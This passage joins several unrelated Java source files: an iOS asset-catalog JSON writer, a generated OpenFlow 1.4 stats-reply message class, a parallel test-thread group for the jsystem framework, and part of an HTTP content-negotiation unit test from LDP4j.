this.idiom.equals(TV.toString()); } public boolean isiOSMarketing() { return this.idiom.equals(IOS_MARKETING.toString()); } public boolean isWatchMarketing() { return this.idiom.equals(WATCH_MARKETING.toString()); } } public enum SUBTYPE { RETINA4 ("retina4") , H667 ("667h") , H736 ("736h") , H1366 ("1366h") , H2436 ("2436h") , MM38 ("38mm") , MM42 ("42mm") ; private String subtype; SUBTYPE(String subtype) { this.subtype = subtype; } @Override public String toString() { return this.subtype; } } public enum EXTENT { FULL_SCREEN ("full-screen") , TO_STATUS_BAR ("to-status-bar") ; private String extent; EXTENT(String extent) { this.extent = extent; } @Override public String toString() { return this.extent; } } public enum ROLE { NOTIFICATION_CENTER ("notificationCenter") , COMPANION_SETTINGS ("companionSettings") , APP_LAUNCHER ("appLauncher") , LONG_LOOK ("longLook") , QUICK_LOOK ("quickLook") ; private String role; ROLE(String role) { this.role = role; } @Override public String toString() { return this.role; } } public enum JSON_VALUE { SCREEN_WIDTH_38MM ("{130,145}") , SCREEN_WIDTH_42MM ("{146,165}") , ORIENTATION_LANDSCAPE ("landscape") , ORIENTATION_PORTRAIT ("portrait") , SIZE_CLASS_ANY ("any") , SIZE_CLASS_COMPACT ("compact") , SIZE_CLASS_REGULAR ("regular") ; private String value; JSON_VALUE(String value) { this.value = value; } @Override public String toString() { return this.value; } } public enum JSON_INFO_KEY { VERSION ("version") , AUTHOR ("author") , RENDERING ("template-rendering-intent") ; private String keyName; JSON_INFO_KEY(String keyName) { this.keyName = keyName; } @Override public String toString() { return this.keyName; } } public enum JSON_INFO_VALUE { VERSION_1 ("1") , AUTHOR_XCODE ("\"xcode\"") , RENDERING_ORIGINAL ("\"original\"") , RENDERING_TEMPLATE ("\"template\"") ; private String value; JSON_INFO_VALUE(String value) { this.value = value; } @Override public String toString() { return this.value; } } public enum JSON_PROPERTY_KEY { 
PRE_RENDERED ("pre-rendered") ; private String keyName; JSON_PROPERTY_KEY(String keyName) { this.keyName = keyName; } @Override public String toString() { return this.keyName; } } public enum JSON_PROPERTY_VALUE { PRE_RENDERED_TRUE ("true") ; private String value; JSON_PROPERTY_VALUE(String value) { this.value = value; } @Override public String toString() { return this.value; } } class JsonUtility extends ArrayList<IOSAssetCatalogs> { private LinkedHashMap<JSON_INFO_KEY, JSON_INFO_VALUE> info; private LinkedHashMap<JSON_PROPERTY_KEY, JSON_PROPERTY_VALUE> properties; public JsonUtility() { super(); this.info = new LinkedHashMap<JSON_INFO_KEY, JSON_INFO_VALUE>(); setInfo(JSON_INFO_KEY.VERSION, JSON_INFO_VALUE.VERSION_1); setInfo(JSON_INFO_KEY.AUTHOR, JSON_INFO_VALUE.AUTHOR_XCODE); this.properties = new LinkedHashMap<JSON_PROPERTY_KEY, JSON_PROPERTY_VALUE>(); } @Override public void clear() { this.info.clear(); this.properties.clear(); super.clear(); } /** * Set additional json infromation. * * @param key * @param value * @return */ public JsonUtility setInfo(JSON_INFO_KEY key, JSON_INFO_VALUE value) { if (value == null) { this.removeInfo(key); } else { info.put(key, value); } return this; } /** * Get additional json information. * * @param key * @return */ public JSON_INFO_VALUE getInfo(JSON_INFO_KEY key) { return info.get(key); } /** * Remove additional json information. * * @param key * @return */ public boolean removeInfo(JSON_INFO_KEY key) { return info.remove(key) != null; } /** * Contains additional json information. * * @param key * @return */ public boolean containsInfo(JSON_INFO_KEY key) { return info.containsKey(key); } /** * Set additional json property. * * @param key * @param value * @return */ public JsonUtility setProperty(JSON_PROPERTY_KEY key, JSON_PROPERTY_VALUE value) { if (value == null) { this.removeProperty(key); } else { properties.put(key, value); } return this; } /** * Get additional json property. 
* * @param key * @return */ public JSON_PROPERTY_VALUE getProperty(JSON_PROPERTY_KEY key) { return properties.get(key); } /** * Remove additional json property. * * @param key * @return */ public boolean removeProperty(JSON_PROPERTY_KEY key) { return properties.remove(key) != null; } /** * Contains additional json property. * * @param key * @return */ public boolean containsProperty(JSON_PROPERTY_KEY key) { return properties.containsKey(key); } /** * Write "Content.json" to File * * @param f * @throws IOException */ public void writeContentJson(File f) throws IOException { BufferedWriter writer = null; try { writer = new BufferedWriter(new FileWriter(f)); writer.write("{\n \"images\" : [\n"); boolean first = true; for (IOSAssetCatalogs imageSet : this) { if (first) { first = false; } else { writer.write(",\n"); } writer.write(((IOSAssetCatalogs) imageSet).toJson()); } writer.write("\n ],\n \"info\" : {\n"); first = true; for (Map.Entry<JSON_INFO_KEY, JSON_INFO_VALUE> keyValue : info.entrySet()) { writer.write(String.format("%s \"%s\" : %s", (first ? "" : ",\n"), keyValue.getKey(), keyValue.getValue())); first = false; } writer.write("\n }"); if (properties.size() > 0) { writer.write(",\n \"properties\" : {\n"); first = true; for (Map.Entry<JSON_PROPERTY_KEY, JSON_PROPERTY_VALUE> keyValue : properties.entrySet()) { writer.write(String.format("%s \"%s\" : %s", (first ? "" : ",\n"), keyValue.getKey(), keyValue.getValue())); first = false; } writer.write("\n }"); } writer.write("\n}"); writer.close(); writer = null; } catch (IOException ioex) { throw ioex; } finally { if (writer != null) { try { writer.close(); } catch (Exception ex) { ex.printStackTrace(); } } } } } /** * Get IOSImageInfo. * * @return IOSImageInfo * @see org.gootara.ios.image.util.IOSImageInfo */ public IOSImageInfo getIOSImageInfo(); /** * Get idiom. * * @return idiom */ public IDIOM getIdiom(); /** * Get minimum system version. 
* * @return minimum system version */ public SYSTEM_VERSION getMinimumSystemVersion(); /** * Get image filename. * * @return filename */ public String getFilename(); /** * Get subtype. * * @return subtype */ public SUBTYPE getSubType(); /** * Get role. * * @return subtype */ public ROLE getRole(); /** * Get JSON string. * * @return JSON string */ public String toJson(); }
// Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University
// Copyright (c) 2011, 2012 Open Networking Foundation
// Copyright (c) 2012, 2013 Big Switch Networks, Inc.
// This library was generated by the LoxiGen Compiler.
// See the file LICENSE.txt which should have been included in the source distribution

// Automatically generated by LOXI from template of_class.java
// Do not modify

package org.projectfloodlight.openflow.protocol.ver14;

import org.projectfloodlight.openflow.protocol.*;
import org.projectfloodlight.openflow.protocol.action.*;
import org.projectfloodlight.openflow.protocol.actionid.*;
import org.projectfloodlight.openflow.protocol.bsntlv.*;
import org.projectfloodlight.openflow.protocol.errormsg.*;
import org.projectfloodlight.openflow.protocol.meterband.*;
import org.projectfloodlight.openflow.protocol.instruction.*;
import org.projectfloodlight.openflow.protocol.instructionid.*;
import org.projectfloodlight.openflow.protocol.match.*;
import org.projectfloodlight.openflow.protocol.oxm.*;
import org.projectfloodlight.openflow.protocol.queueprop.*;
import org.projectfloodlight.openflow.types.*;
import org.projectfloodlight.openflow.util.*;
import org.projectfloodlight.openflow.exceptions.*;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.Set;
import com.google.common.collect.ImmutableSet;
import java.util.List;
import com.google.common.collect.ImmutableList;
import org.jboss.netty.buffer.ChannelBuffer;
import com.google.common.hash.PrimitiveSink;
import com.google.common.hash.Funnel;

// Immutable wire representation of the BSN switch-pipeline stats reply
// (experimenter stats, experimenter 0x5c16c7, subtype 6) for OF 1.4.
class OFBsnSwitchPipelineStatsReplyVer14 implements OFBsnSwitchPipelineStatsReply {
    private static final Logger logger = LoggerFactory.getLogger(OFBsnSwitchPipelineStatsReplyVer14.class);
    // version: 1.4
    final static byte WIRE_VERSION = 5;
    // fixed header + experimenter stats prefix; entries are variable-length
    final static int MINIMUM_LENGTH = 24;

        private final static long DEFAULT_XID = 0x0L;
        private final static Set<OFStatsReplyFlags> DEFAULT_FLAGS = ImmutableSet.<OFStatsReplyFlags>of();
        private final static List<OFBsnSwitchPipelineStatsEntry> DEFAULT_ENTRIES = ImmutableList.<OFBsnSwitchPipelineStatsEntry>of();

    // OF message fields
    private final long xid;
    private final Set<OFStatsReplyFlags> flags;
    private final List<OFBsnSwitchPipelineStatsEntry> entries;
//
    // Immutable default instance
    final static OFBsnSwitchPipelineStatsReplyVer14 DEFAULT = new OFBsnSwitchPipelineStatsReplyVer14(
        DEFAULT_XID, DEFAULT_FLAGS, DEFAULT_ENTRIES
    );

    // package private constructor - used by readers, builders, and factory
    OFBsnSwitchPipelineStatsReplyVer14(long xid, Set<OFStatsReplyFlags> flags, List<OFBsnSwitchPipelineStatsEntry> entries) {
        if(flags == null) {
            throw new NullPointerException("OFBsnSwitchPipelineStatsReplyVer14: property flags cannot be null");
        }
        if(entries == null) {
            throw new NullPointerException("OFBsnSwitchPipelineStatsReplyVer14: property entries cannot be null");
        }
        this.xid = xid;
        this.flags = flags;
        this.entries = entries;
    }

    // Accessors for OF message fields
    @Override
    public OFVersion getVersion() {
        return OFVersion.OF_14;
    }

    @Override
    public OFType getType() {
        return OFType.STATS_REPLY;
    }

    @Override
    public long getXid() {
        return xid;
    }

    @Override
    public OFStatsType getStatsType() {
        return OFStatsType.EXPERIMENTER;
    }

    @Override
    public Set<OFStatsReplyFlags> getFlags() {
        return flags;
    }

    @Override
    public long getExperimenter() {
        return 0x5c16c7L;
    }

    @Override
    public long getSubtype() {
        return 0x6L;
    }

    @Override
    public List<OFBsnSwitchPipelineStatsEntry> getEntries() {
        return entries;
    }

    public OFBsnSwitchPipelineStatsReply.Builder createBuilder() {
        return new BuilderWithParent(this);
    }

    // Builder that falls back to the parent message for any property not set
    static class BuilderWithParent implements OFBsnSwitchPipelineStatsReply.Builder {
        final OFBsnSwitchPipelineStatsReplyVer14 parentMessage;

        // OF message fields
        private boolean xidSet;
        private long xid;
        private boolean flagsSet;
        private Set<OFStatsReplyFlags> flags;
        private boolean entriesSet;
        private List<OFBsnSwitchPipelineStatsEntry> entries;

        BuilderWithParent(OFBsnSwitchPipelineStatsReplyVer14 parentMessage) {
            this.parentMessage = parentMessage;
        }

        @Override
        public OFVersion getVersion() {
            return OFVersion.OF_14;
        }

        @Override
        public OFType getType() {
            return OFType.STATS_REPLY;
        }

        @Override
        public long getXid() {
            return xid;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply.Builder setXid(long xid) {
            this.xid = xid;
            this.xidSet = true;
            return this;
        }

        @Override
        public OFStatsType getStatsType() {
            return OFStatsType.EXPERIMENTER;
        }

        @Override
        public Set<OFStatsReplyFlags> getFlags() {
            return flags;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply.Builder setFlags(Set<OFStatsReplyFlags> flags) {
            this.flags = flags;
            this.flagsSet = true;
            return this;
        }

        @Override
        public long getExperimenter() {
            return 0x5c16c7L;
        }

        @Override
        public long getSubtype() {
            return 0x6L;
        }

        @Override
        public List<OFBsnSwitchPipelineStatsEntry> getEntries() {
            return entries;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply.Builder setEntries(List<OFBsnSwitchPipelineStatsEntry> entries) {
            this.entries = entries;
            this.entriesSet = true;
            return this;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply build() {
                long xid = this.xidSet ? this.xid : parentMessage.xid;
                Set<OFStatsReplyFlags> flags = this.flagsSet ? this.flags : parentMessage.flags;
                if(flags == null)
                    throw new NullPointerException("Property flags must not be null");
                List<OFBsnSwitchPipelineStatsEntry> entries = this.entriesSet ? this.entries : parentMessage.entries;
                if(entries == null)
                    throw new NullPointerException("Property entries must not be null");

                //
                return new OFBsnSwitchPipelineStatsReplyVer14(
                    xid,
                    flags,
                    entries
                );
        }
    }

    // Builder that uses the class-level defaults for any property not set
    static class Builder implements OFBsnSwitchPipelineStatsReply.Builder {
        // OF message fields
        private boolean xidSet;
        private long xid;
        private boolean flagsSet;
        private Set<OFStatsReplyFlags> flags;
        private boolean entriesSet;
        private List<OFBsnSwitchPipelineStatsEntry> entries;

        @Override
        public OFVersion getVersion() {
            return OFVersion.OF_14;
        }

        @Override
        public OFType getType() {
            return OFType.STATS_REPLY;
        }

        @Override
        public long getXid() {
            return xid;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply.Builder setXid(long xid) {
            this.xid = xid;
            this.xidSet = true;
            return this;
        }

        @Override
        public OFStatsType getStatsType() {
            return OFStatsType.EXPERIMENTER;
        }

        @Override
        public Set<OFStatsReplyFlags> getFlags() {
            return flags;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply.Builder setFlags(Set<OFStatsReplyFlags> flags) {
            this.flags = flags;
            this.flagsSet = true;
            return this;
        }

        @Override
        public long getExperimenter() {
            return 0x5c16c7L;
        }

        @Override
        public long getSubtype() {
            return 0x6L;
        }

        @Override
        public List<OFBsnSwitchPipelineStatsEntry> getEntries() {
            return entries;
        }

        @Override
        public OFBsnSwitchPipelineStatsReply.Builder setEntries(List<OFBsnSwitchPipelineStatsEntry> entries) {
            this.entries = entries;
            this.entriesSet = true;
            return this;
        }

        //
        @Override
        public OFBsnSwitchPipelineStatsReply build() {
            long xid = this.xidSet ? this.xid : DEFAULT_XID;
            Set<OFStatsReplyFlags> flags = this.flagsSet ? this.flags : DEFAULT_FLAGS;
            if(flags == null)
                throw new NullPointerException("Property flags must not be null");
            List<OFBsnSwitchPipelineStatsEntry> entries = this.entriesSet ? this.entries : DEFAULT_ENTRIES;
            if(entries == null)
                throw new NullPointerException("Property entries must not be null");

            return new OFBsnSwitchPipelineStatsReplyVer14(
                    xid,
                    flags,
                    entries
                );
        }
    }

    final static Reader READER = new Reader();

    // Deserializer: validates all fixed-value header fields, then reads the
    // variable-length entry list. Returns null when the buffer is short.
    static class Reader implements OFMessageReader<OFBsnSwitchPipelineStatsReply> {
        @Override
        public OFBsnSwitchPipelineStatsReply readFrom(ChannelBuffer bb) throws OFParseError {
            int start = bb.readerIndex();
            // fixed value property version == 5
            byte version = bb.readByte();
            if(version != (byte) 0x5)
                throw new OFParseError("Wrong version: Expected=OFVersion.OF_14(5), got="+version);
            // fixed value property type == 19
            byte type = bb.readByte();
            if(type != (byte) 0x13)
                throw new OFParseError("Wrong type: Expected=OFType.STATS_REPLY(19), got="+type);
            int length = U16.f(bb.readShort());
            if(length < MINIMUM_LENGTH)
                throw new OFParseError("Wrong length: Expected to be >= " + MINIMUM_LENGTH + ", was: " + length);
            if(bb.readableBytes() + (bb.readerIndex() - start) < length) {
                // Buffer does not have all data yet
                bb.readerIndex(start);
                return null;
            }
            if(logger.isTraceEnabled())
                logger.trace("readFrom - length={}", length);
            long xid = U32.f(bb.readInt());
            // fixed value property statsType == 65535
            short statsType = bb.readShort();
            if(statsType != (short) 0xffff)
                throw new OFParseError("Wrong statsType: Expected=OFStatsType.EXPERIMENTER(65535), got="+statsType);
            Set<OFStatsReplyFlags> flags = OFStatsReplyFlagsSerializerVer14.readFrom(bb);
            // pad: 4 bytes
            bb.skipBytes(4);
            // fixed value property experimenter == 0x5c16c7L
            int experimenter = bb.readInt();
            if(experimenter != 0x5c16c7)
                throw new OFParseError("Wrong experimenter: Expected=0x5c16c7L(0x5c16c7L), got="+experimenter);
            // fixed value property subtype == 0x6L
            int subtype = bb.readInt();
            if(subtype != 0x6)
                throw new OFParseError("Wrong subtype: Expected=0x6L(0x6L), got="+subtype);
            List<OFBsnSwitchPipelineStatsEntry> entries = ChannelUtils.readList(bb, length - (bb.readerIndex() - start), OFBsnSwitchPipelineStatsEntryVer14.READER);

            OFBsnSwitchPipelineStatsReplyVer14 bsnSwitchPipelineStatsReplyVer14 = new OFBsnSwitchPipelineStatsReplyVer14(
                    xid,
                    flags,
                    entries
                    );
            if(logger.isTraceEnabled())
                logger.trace("readFrom - read={}", bsnSwitchPipelineStatsReplyVer14);
            return bsnSwitchPipelineStatsReplyVer14;
        }
    }

    public void putTo(PrimitiveSink sink) {
        FUNNEL.funnel(this, sink);
    }

    final static OFBsnSwitchPipelineStatsReplyVer14Funnel FUNNEL = new OFBsnSwitchPipelineStatsReplyVer14Funnel();

    // Guava Funnel: feeds the wire-relevant fields into a PrimitiveSink for hashing
    static class OFBsnSwitchPipelineStatsReplyVer14Funnel implements Funnel<OFBsnSwitchPipelineStatsReplyVer14> {
        private static final long serialVersionUID = 1L;
        @Override
        public void funnel(OFBsnSwitchPipelineStatsReplyVer14 message, PrimitiveSink sink) {
            // fixed value property version = 5
            sink.putByte((byte) 0x5);
            // fixed value property type = 19
            sink.putByte((byte) 0x13);
            // FIXME: skip funnel of length
            sink.putLong(message.xid);
            // fixed value property statsType = 65535
            sink.putShort((short) 0xffff);
            OFStatsReplyFlagsSerializerVer14.putTo(message.flags, sink);
            // skip pad (4 bytes)
            // fixed value property experimenter = 0x5c16c7L
            sink.putInt(0x5c16c7);
            // fixed value property subtype = 0x6L
            sink.putInt(0x6);
            FunnelUtils.putList(message.entries, sink);
        }
    }

    public void writeTo(ChannelBuffer bb) {
        WRITER.write(bb, this);
    }

    final static Writer WRITER = new Writer();

    // Serializer: mirrors Reader, back-patching the length field at the end
    static class Writer implements OFMessageWriter<OFBsnSwitchPipelineStatsReplyVer14> {
        @Override
        public void write(ChannelBuffer bb, OFBsnSwitchPipelineStatsReplyVer14 message) {
            int startIndex = bb.writerIndex();
            // fixed value property version = 5
            bb.writeByte((byte) 0x5);
            // fixed value property type = 19
            bb.writeByte((byte) 0x13);
            // length is length of variable message, will be updated at the end
            int lengthIndex = bb.writerIndex();
            bb.writeShort(U16.t(0));
            bb.writeInt(U32.t(message.xid));
            // fixed value property statsType = 65535
            bb.writeShort((short) 0xffff);
            OFStatsReplyFlagsSerializerVer14.writeTo(bb,
message.flags); // pad: 4 bytes bb.writeZero(4); // fixed value property experimenter = 0x5c16c7L bb.writeInt(0x5c16c7); // fixed value property subtype = 0x6L bb.writeInt(0x6); ChannelUtils.writeList(bb, message.entries); // update length field int length = bb.writerIndex() - startIndex; bb.setShort(lengthIndex, length); } } @Override public String toString() { StringBuilder b = new StringBuilder("OFBsnSwitchPipelineStatsReplyVer14("); b.append("xid=").append(xid); b.append(", "); b.append("flags=").append(flags); b.append(", "); b.append("entries=").append(entries); b.append(")"); return b.toString(); } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; OFBsnSwitchPipelineStatsReplyVer14 other = (OFBsnSwitchPipelineStatsReplyVer14) obj; if( xid != other.xid) return false; if (flags == null) { if (other.flags != null) return false; } else if (!flags.equals(other.flags)) return false; if (entries == null) { if (other.entries != null) return false; } else if (!entries.equals(other.entries)) return false; return true; } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * (int) (xid ^ (xid >>> 32)); result = prime * result + ((flags == null) ? 0 : flags.hashCode()); result = prime * result + ((entries == null) ? 0 : entries.hashCode()); return result; } }
/* * Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved. */ package jsystem.extensions.threads; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import jsystem.framework.fixture.FixtureManager; import jsystem.framework.report.ListenerstManager; import jsystem.framework.report.ReportElement; import jsystem.framework.report.Reporter; import jsystem.framework.report.Reporter.EnumReportLevel; import junit.framework.AssertionFailedError; import junit.framework.SystemTestCase; import junit.framework.TestListener; import junit.framework.TestResult; /** * This class manages a group of tests that will be executed in parallel. */ public class TestThreadGroup { private String groupName; private HashMap<String, ThreadedTest> threadedTests = new HashMap<String, ThreadedTest>(); TestThreadGroup(String groupName) { this.groupName = groupName; } /** * Add a new test to the group. * @param test - test to add. */ public void addTest(SystemTestCase test){ FixtureManager fm = FixtureManager.getInstance(); // set current fixture test.setFixture(fm.getFixture(fm.getCurrentFixture()).getClass()); ThreadedTest threadedTest = new ThreadedTest(test); if (!test.getTestDocumentation().isEmpty()){ threadedTests.put(test.getTestDocumentation(), threadedTest); } else { threadedTests.put(test.getName(), threadedTest); } } /** * Start the execution of all the tests that were added. */ public void start(){ ListenerstManager.getInstance().startBufferingReports(true); for (String threadName : threadedTests.keySet()) { threadedTests.get(threadName).setName(threadName); if (TestThreadFactory.getInstance().isRunInParallel()){ threadedTests.get(threadName).start(); } else { threadedTests.get(threadName).run(); } } } /** * Join all the executions. * @param timeout - the time to wait in milliseconds. 
* @throws Exception */ public void join(long timeout) throws Exception{ ListenerstManager.getInstance().report("Joining " + threadedTests.size()+ " running tests"); for (String threadName : threadedTests.keySet()) { threadedTests.get(threadName).join(timeout); } ListenerstManager.getInstance().report("Finished joining " + threadedTests.size() + " running tests"); for (String threadName : threadedTests.keySet()) { if(threadedTests.get(threadName).isAlive()){ ListenerstManager.getInstance().report("Thread name '" + threadName + "' was still alive after timeout - interrupting thread", false); threadedTests.get(threadName).interrupt(); } } ListenerstManager.getInstance().stopBufferingReports(); List<ReportElement> list = ListenerstManager.getInstance().getReportsBuffer(); if (list == null){ return; } ListenerstManager.getInstance().clearReportsBuffer(); HashMap<String, List<ReportElement>> reportsGroup = new HashMap<String, List<ReportElement>>(); //sort reports according to the threaded tests for(ReportElement el: list){ if(!reportsGroup.containsKey(el.getOriginator())){ ArrayList<ReportElement> group = new ArrayList<ReportElement>(); reportsGroup.put(el.getOriginator(), group); } reportsGroup.get(el.getOriginator()).add(el); } if (TestThreadFactory.getInstance().isRunInParallel()){ for (String threadName : threadedTests.keySet()) { ListenerstManager.getInstance().startLevel(threadName, EnumReportLevel.CurrentPlace); //print buffered reports under correct level for(ReportElement el: reportsGroup.get(threadName)){ //set threaded test fail status if (el.getStatus() == Reporter.FAIL){ threadedTests.get(threadName).setPass(false); // if report fail was found if (threadedTests.get(threadName).getTest().getTestResult().wasSuccessful()){ threadedTests.get(threadName).setFailReports(true); } // if exception fail was found else { continue; } } ListenerstManager.getInstance().report(el); } if (!threadedTests.get(threadName).isPass()){ if 
(threadedTests.get(threadName).isFailReports()){ threadedTests.get(threadName).setPass(false); //print exception fail report, if exist threadedTests.get(threadName).getTest().setPass(false); threadedTests.get(threadName).getTest().getTestResult().addFailure(threadedTests.get(threadName).getTest(), new AssertionFailedError("Fail report was submitted")); threadedTests.get(threadName).setThrown(threadedTests.get(threadName).getTest().getTestResult().failures().nextElement().thrownException()); ListenerstManager.getInstance().addFailure(threadedTests.get(threadName).getTest(), (AssertionFailedError)threadedTests.get(threadName).getThrown()); } else if (threadedTests.get(threadName).getTest().getTestResult().errorCount() > 0) { //print exception message, if thrown threadedTests.get(threadName).getTest().setPass(false); threadedTests.get(threadName).setThrown(threadedTests.get(threadName).getTest().getTestResult().errors().nextElement().thrownException()); ListenerstManager.getInstance().addError(threadedTests.get(threadName).getTest(), threadedTests.get(threadName).getThrown()); } } ListenerstManager.getInstance().stopLevel(); } } else { for(ReportElement el: reportsGroup.get("main")){ ListenerstManager.getInstance().report(el); } } TestThreadFactory.getInstance().removeGroup(groupName); } /** * @return group name. */ public String getGroupName() { return groupName; } } /** * This class execute group tests in parallel. * */ class ThreadedTest extends Thread{ private SystemTestCase test; public SystemTestCase getTest() { return test; } public void setTest(SystemTestCase test) { this.test = test; } private boolean isPass = false; private boolean failReports = false; private Throwable thrown; public ThreadedTest(SystemTestCase test){ this.test = test; } /** * Run the test. 
*/ public void run(){ test.run(new TestResult() { public void addListener(TestListener listener) { } }); isPass = test.getTestResult().wasSuccessful(); //print exception reports, if exist if (!isPass){ if (test.getTestResult().errorCount() > 0) { thrown = test.getTestResult().errors().nextElement().thrownException(); } ListenerstManager.getInstance().addError(test, thrown); } } public void setPass(boolean isPass) { this.isPass = isPass; } /** * @return true if test was failed. */ public boolean isPass() { return isPass; } /** * @return true if test was failed with reports. */ public boolean isFailReports() { return failReports; } public void setFailReports(boolean failReports) { this.failReports = failReports; } public void setThrown(Throwable thrown) { this.thrown = thrown; } /** * @return exception that thrown by the test. */ public Throwable getThrown() { return thrown; } }
/** * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * This file is part of the LDP4j Project: * http://www.ldp4j.org/ * * Center for Open Middleware * http://www.centeropenmiddleware.com/ * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * Copyright (C) 2014-2016 Center for Open Middleware. * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# * Artifact : org.ldp4j.commons:ldp4j-commons-http:0.2.2 * Bundle : ldp4j-commons-http-0.2.2.jar * #-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# */ package org.ldp4j.http; import static org.hamcrest.MatcherAssert.assertThat; import static org.hamcrest.Matchers.equalTo; import static org.hamcrest.Matchers.nullValue; import static org.junit.Assert.fail; import java.nio.charset.StandardCharsets; import java.util.Collection; import java.util.Locale; import java.util.Map.Entry; import org.junit.Rule; import org.junit.Test; import org.junit.rules.TestName; import org.ldp4j.http.Quality.Type; import com.google.common.base.Joiner; import com.google.common.base.Optional; import com.google.common.collect.Multimap; public class ContentNegotiatorTest { @Rule public TestName name=new TestName(); private static final MediaType TEXT_HTML = MediaTypes.of("text", "html"); private static final MediaType POSTSCRIPT = 
MediaTypes.of("application", "postscript"); private static final CharacterEncoding UTF_8 = CharacterEncodings.of(StandardCharsets.UTF_8); private static final CharacterEncoding US_ASCII = CharacterEncodings.of(StandardCharsets.US_ASCII); private static final CharacterEncoding ISO_8859_1 = CharacterEncodings.of(StandardCharsets.ISO_8859_1); private static final Language FRENCH = Languages.of(Locale.FRENCH); private static final Language ENGLISH = Languages.of(Locale.ENGLISH); private static final Language GERMAN = Languages.of(Locale.GERMAN); @Test public void negotiatesWithNoSupportedAlternatives() throws Exception { checkCannotNegotiate(specRequirementsNegotiator()); } @Test public void negotiatesWithNoAcceptableRequirements() throws Exception { NegotiationResult result = baseNegotiator(). support(POSTSCRIPT). support(TEXT_HTML). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, POSTSCRIPT, ContentNegotiator.DEFAULT_CHARACTER_ENCODING, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(4)); } @Test public void negotiatesWithGenericSupportedEntities() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(POSTSCRIPT). support(TEXT_HTML). support(ENGLISH). support(FRENCH). negotiate(); checkNegotiation( result, true, TEXT_HTML, ContentNegotiator.DEFAULT_CHARACTER_ENCODING, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(4)); } @Test public void negotiatesWithOverridingAlternatives() throws Exception { NegotiationResult result = specRequirementsNegotiator(). support(ContentNegotiator.DEFAULT_MEDIA_TYPE). support(POSTSCRIPT). support(FRENCH). support(ENGLISH). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(0.9D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.7D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(1.0D)). 
negotiate(); checkNegotiation( result, true, TEXT_HTML, null, ENGLISH, Optional.of(Quality.Type.DEFINITE), null, Optional.of(6)); } @Test public void negotiationMightResultInSpeculativeChoices() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(1.0D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.8D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(0.5D)). negotiate(); checkNegotiation( result, true, POSTSCRIPT, null, ENGLISH, Optional.of(Quality.Type.SPECULATIVE), null, Optional.of(3)); } @Test public void negotiationDoesNotEnrichPredefinedAlternatives() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). acceptCharset("us-ascii;q=0.1"). acceptCharset("*;q=0.5"). support(Variants.builder().type(TEXT_HTML).language(ENGLISH).alternative(1.0D)). support(Variants.builder().type(TEXT_HTML).language(FRENCH).alternative(0.8D)). support(Variants.builder().type(POSTSCRIPT).language(ENGLISH).alternative(0.5D)). negotiate(); checkNegotiation( result, true, POSTSCRIPT, null, ENGLISH, Optional.of(Quality.Type.SPECULATIVE), null, Optional.of(3)); } @Test public void negotiationDoesNotEnrichMissingAttributesWithSpeculativeValues() throws Exception { NegotiationResult result = baseNegotiator(). accept("text/*;q=0.2"). accept("*/*;q=1.0"). acceptLanguage("en;q=1.0"). acceptLanguage("fr;q=0.5"). support(ENGLISH). support(FRENCH). 
